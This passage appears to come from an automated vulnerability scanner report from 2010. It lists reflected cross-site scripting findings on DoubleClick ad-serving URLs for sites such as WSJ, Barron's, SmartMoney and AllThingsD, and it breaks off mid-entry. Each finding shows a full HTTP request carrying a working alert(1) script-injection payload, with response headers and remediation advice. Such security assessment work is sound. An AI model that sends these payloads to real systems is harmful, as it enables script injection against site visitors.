GET /adj/allthingsd.com/general_faq;tile=f2538'-alert(1)-'2cd68d761f HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/faq/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47854 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:28:39 GMT Expires: Sun, 07 Nov 2010 09:28:39 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e72c'-alert(1)-'9f650eeb8ae was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_privacy;tile=5e72c'-alert(1)-'9f650eeb8ae HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/privacy/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:05:24 GMT Expires: Sun, 07 Nov 2010 10:05:24 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9943'-alert(1)-'2c28b6bac73 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_signup;tile=d9943'-alert(1)-'2c28b6bac73 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/signup/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:05:31 GMT Expires: Sun, 07 Nov 2010 10:05:31 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2f'-alert(1)-'6052c8ee34d was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_terms;tile=83f2f'-alert(1)-'6052c8ee34d HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/terms/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:29:20 GMT Expires: Sun, 07 Nov 2010 09:29:20 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c82'-alert(1)-'39e03d1d77f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/joblistings;tile=22c82'-alert(1)-'39e03d1d77f HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.jobamatic.com/a/jobs/find-jobs Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:30:04 GMT Expires: Sun, 07 Nov 2010 09:30:04 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae19'-alert(1)-'47a53f04f63 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/kara_front;tile=5ae19'-alert(1)-'47a53f04f63 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://kara.allthingsd.com/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:30:38 GMT Expires: Sun, 07 Nov 2010 09:30:38 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c86'-alert(1)-'2dfb3ee7892 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_front;tile=26c86'-alert(1)-'2dfb3ee7892 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://walt.allthingsd.com/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:31:34 GMT Expires: Sun, 07 Nov 2010 09:31:34 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed9a0'-alert(1)-'9326ee9ef41 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_mailboxfront;tile=ed9a0'-alert(1)-'9326ee9ef41 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://mailbox.allthingsd.com/?mod=ATD_skybox Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:31:26 GMT Expires: Sun, 07 Nov 2010 09:31:26 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45eb9'-alert(1)-'d3fbe3bd686 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/walt_personaltecharchives;tile=45eb9'-alert(1)-'d3fbe3bd686 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://ptech.allthingsd.com/20101027/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:31:24 GMT Expires: Sun, 07 Nov 2010 09:31:24 GMT Connection: close
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eec9'%3balert(1)//61b098e61c1 was submitted in the !category parameter. This input was echoed as 6eec9';alert(1)//61b098e61c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front;!category=6eec9'%3balert(1)//61b098e61c1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/public_front;!category=;page=twmoeReload;;mc=0;tile=10;sz=300x250,336x280,300x600;ord=8263826382638263; Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 383 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:08:32 GMT Expires: Sun, 07 Nov 2010 10:08:32 GMT
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 331b9'%3bfb497608941 was submitted in the !category parameter. This input was echoed as 331b9';fb497608941 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front;!category=331b9'%3bfb497608941 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/public_front;!category=;page=twmoeReload;;mc=0;tile=10;sz=300x250,336x280,300x600;ord=8263826382638263; Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 375 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:32:14 GMT Expires: Sun, 07 Nov 2010 09:32:14 GMT
1.48. http://ad.doubleclick.net/adj/barrons.com/public_front [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/barrons.com/public_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3981'-alert(1)-'e3b2c8f1463 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/barrons.com/public_front?a3981'-alert(1)-'e3b2c8f1463=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 377 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:29:03 GMT Expires: Sun, 07 Nov 2010 06:29:03 GMT Connection: close
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab84'-alert(1)-'992706a3ac8 was submitted in the !category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.50. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/default [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/bottom.interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd8b'-alert(1)-'91d7e574afc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/bottom.interactive.wsj.com/default?dfd8b'-alert(1)-'91d7e574afc=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058||t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 374 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 03:07:36 GMT Expires: Sat, 06 Nov 2010 03:07:36 GMT Connection: close
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2c0c'%3balert(1)//5290eeaa5b7 was submitted in the columns parameter. This input was echoed as c2c0c';alert(1)//5290eeaa5b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/frontpage;columns=c2c0c'%3balert(1)//5290eeaa5b7 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 282 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:01:56 GMT Expires: Sat, 06 Nov 2010 16:01:56 GMT
1.52. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/frontpage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/brokerbutton.smartmoney.com/frontpage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5268a'-alert(1)-'9e77bdc687b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/frontpage;columns=;contentid=0;pos=4;pagetemplate=0;level2=homepage;tile=4;sz=300x30;ord=1157423771?&5268a'-alert(1)-'9e77bdc687b=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 06 Nov 2010 16:02:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 355
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd18'%3b9e07191bf84 was submitted in the columns parameter. This input was echoed as cdd18';9e07191bf84 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/topnav;columns=cdd18'%3b9e07191bf84 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 565 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:01:57 GMT Expires: Sat, 06 Nov 2010 16:01:57 GMT
1.54. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/topnav [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/brokerbutton.smartmoney.com/topnav
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43980'-alert(1)-'545e96a96dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/topnav;columns=;contentid=0;pos=2;pagetemplate=0;level2=homepage;tile=2;sz=120x30;ord=1157423771?&43980'-alert(1)-'545e96a96dd=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 06 Nov 2010 16:02:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 645
The value of the columns request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c3a'%3balert(1)//428bf2bea99 was submitted in the columns parameter. This input was echoed as e4c3a';alert(1)//428bf2bea99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/watchlist;columns=e4c3a'%3balert(1)//428bf2bea99 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 372 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:04:05 GMT Expires: Sat, 06 Nov 2010 16:04:05 GMT
1.56. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/watchlist [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/brokerbutton.smartmoney.com/watchlist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c24b0'-alert(1)-'36ef8a57f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/watchlist;columns=;contentid=0;pos=6;pagetemplate=0;level2=homepage;tile=6;sz=120x30;ord=1157423771?&c24b0'-alert(1)-'36ef8a57f3c=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 06 Nov 2010 16:04:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 444
The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 281fb'-alert(1)-'3e94587aff7 was submitted in the !category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.58. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/front_nonsub
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b7d'-alert(1)-'197373e1ddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/front_nonsub?b2b7d'-alert(1)-'197373e1ddd=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 352 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:11:41 GMT Expires: Sat, 06 Nov 2010 16:11:41 GMT Connection: close
1.59. http://ad.doubleclick.net/adj/interactive.wsj.com/leadership [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/leadership
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8555d'-alert(1)-'e449acf0ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/leadership?8555d'-alert(1)-'e449acf0ff=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 351 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:33:18 GMT Expires: Sun, 07 Nov 2010 06:33:18 GMT Connection: close
1.60. http://ad.doubleclick.net/adj/interactive.wsj.com/leadership_style [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/leadership_style
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da30'-alert(1)-'0ecc1ed66b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/interactive.wsj.com/leadership_style?6da30'-alert(1)-'0ecc1ed66b4=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 352 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:33:22 GMT Expires: Sun, 07 Nov 2010 06:33:22 GMT Connection: close
1.61. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_front [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/interactive.wsj.com/markets_front
Issue detail
